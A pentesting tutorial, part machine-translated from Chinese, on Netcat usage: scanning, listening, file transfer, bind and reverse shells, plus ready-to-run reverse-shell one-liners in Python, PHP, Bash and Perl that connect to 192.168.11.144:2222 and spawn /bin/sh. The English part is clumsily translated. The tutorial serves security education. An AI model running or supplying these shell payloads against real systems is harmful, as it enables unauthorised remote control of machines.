Foreword
Recently doing a penetration test when it came to the issue rebound port monitoring and shell, and in the process she had a new understanding of an artifact that Netcat, Netcat usage of some now do a little summary, I hope to help you !
Netcat Profile
Netcat is a very well-known networking tools, referred to as "NC", has a penetration test of the "Swiss Army knife," he said. It can be used as port monitoring, port scanning, remote file transfer, remote shell also allows other functions. In short powerful, powerful NC can be described with a more humorous words - "Your imagination is a limitation of the NC bottleneck."
Netcat Options Parameter Description
Function: port scanning, port monitoring, remote file transfer, remote shell, and so on;
Syntax: NC [-hlnruz] [- G <gateway ...>] [- G <pointer number>] [- i <seconds delay>] [- o <output file>] [- p <communications port> ] [- s <source address>] [- v ...] [ - w < timeout in seconds>] [host name] [communication port ...]
Participation number:
-g <gateway> Set the communication gateway router hops, can be set up to eight;
-G <point number> Settings Source route point, a value which is a multiple of 4;
-h online help;
-i <delay in seconds> set the time interval in order to transfer the scanning information and communication ports;
-l use a listening mode, incoming data management and control;
-n IP address directly, without passing through the domain name server;
-o <output file> specify the file name, the transmission of data to and from the word hexadecimal dump to save the file;
-p <communications port> Set the communication port used by the local host;
-r nonce specify a communications port of the local and remote host;
-s <Source address> set local host IP address of the packet sent;
-u UDP transport protocol used;
-v display process execution instruction;
-w <timeout in seconds> connection set waiting time;
Use -z 0 input / output mode, only the communication port during the scan.
Netcat简易使用
连接到远程主机
命令:nc -nvv Targert_IP Targert_Port
监听本地主机
命令:nc -l -p Local_Port
端口扫描
扫描指定主机的单一端口是否开放
格式:nc -v target_IP target_Port
扫描指定主机的某个端口段的端口开放信息
格式:nc -v -z Target_IP Target_Port_Start - Target_Port_End
扫描指定主机的某个UDP端口段,并且返回端口信息
格式:nc -v -z -u Target_IP Target_Port_Start - Target_Port_End
扫描指定主机的端口段信息,并且设置超时时间为3秒
格式:nc -vv(-v) -z -w time Target_IP Target_Port_Start-Targert_Port_End
端口监听
监听本地端口
格式:nc -l -p local_Port
注:先设置监听(不能出现端口冲突),之后如果有外来访问则输出该详细信息到命令行
监听本地端口,并且将监听到的信息保存到指定的文件中
格式:nc -l -p local_Port > target_File
连接远程系统
格式:nc Target_IP Target_Port
之后可以运行HTTP请求
FTP匿名探测
格式:nc Targert_IP 21
文件传输
传输端:
格式:nc Targert_IP Targert_Port < Targert_File
接收端:
格式:nc -l Local_Port > Targert_File
简易聊天
本地主机
命令:nc -l 8888
远程主机
命令:nc Targert_IP Targert_Port
蜜罐
作为蜜罐使用1:
命令:nc -L -p Port
注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止
作为蜜罐使用2:
命令:nc -L -p Port >log.txt
注:使用“-L”参数可以不停的监听某一个端口,知道Ctrl+C为止,同时把结果输出到log.txt文件中,如果把“>”改为“>>”即追加到文件之后。
这一个命令参数“-L”在Windows中有,现在的Linux中是没有这个选项的,但是自己可以去找找,这里只是想到了之前的这个使用,所以提出来简单介绍一下!
获取shell
简述:获取shell分为两种,一种是正向shell,一种是方向shell。如果客户端连接服务器端,想要获取服务器端的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想要获取客户端的shell,那么称为反向shell
正向shell
本地主机:
命令:nc Targert_IP Targert_Port
目标主机:
命令:nc -lvp Targert_Port -e /bin/sh
反向shell
本地主机:
命令: nc -lvp Target_Port
目标主机:
命令: nc Targert_IP Targert_Port -e /bin/sh
Special circumstances - on the target host is not Netcat, how to get a reverse shell
Under normal circumstances, generally do not have the Netcat on the target host, then you need to use alternative methods to achieve the purpose of backlinks attacking host, following a brief introduction of several reverse shell settings.
python reverse shell
Target host execute the statement:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
local host
Target host
PHP reverse shell
Target host execute the statement:
php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'
local host:
Destination Host:
Bash reverse shell
Target host execute the statement:
bash -i>&/dev/tcp/192.168.11.144/2222 0>&1
local host:
Destination Host:
Perl reverse shell
Target host execute the statement:
perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
local host
Target host
NOTE: Writing must pay attention to this single quotes, double quotes in English format, or will report wrong!
Summary: There is a saying as "Reviewing the Old", while another word is "practice makes perfect", when the two sentences at the same time to practice, it will wipe out different spark, you will see your not seen before, to master the skills before you strange! Netcat of course, easy to use, but also through practice to know, what are you waiting for?
* The author: Fly a bright future, please indicate from FreeBuf.COM